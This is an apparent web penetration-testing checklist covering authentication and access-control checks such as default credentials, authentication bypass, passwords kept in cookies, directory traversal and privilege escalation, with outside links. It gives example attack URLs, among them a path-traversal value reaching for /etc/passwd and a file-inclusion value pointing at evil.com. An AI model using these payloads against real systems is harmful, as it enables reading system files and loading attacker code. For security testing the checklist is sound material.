If you are done checking the Checklist 1 then only go with this otherwise it will be so confusing for you
[ ] Test for Credentials Transported Over Encryption
[ ] Test for Default Credentials on admin page/console or any sign in panel.
[ ] Bypassing the Authentication
https://www.youtube.com/watch?v=vRHoVPBeICo&t=3s
[ ] Check for Broken Access Control
[ ] Remember Password Checking
Check that is password being stored in the Cookies or being constantly transferred in every request of the website. The credentials should only be sent in login phase.
[ ] Check for Directory Traversal Includes File Input
You have to check each and every input which your website and its directories take from user
https://spinthehack.in/getuserprofile.jsp?item=manager.html https://spinthehack.in/index.php?file=content
https://spinthehack.in/getuserprofile.jsp?item=.../../../../etc/passwd https://spinthehack.in/index.php?file=https://evil.com/
</aside>
[ ] Checking for Privilege Escalation
<aside> 💡 https://shahjerry33.medium.com/privilege-escalation-hello-admin-a53ac14fd388
</aside>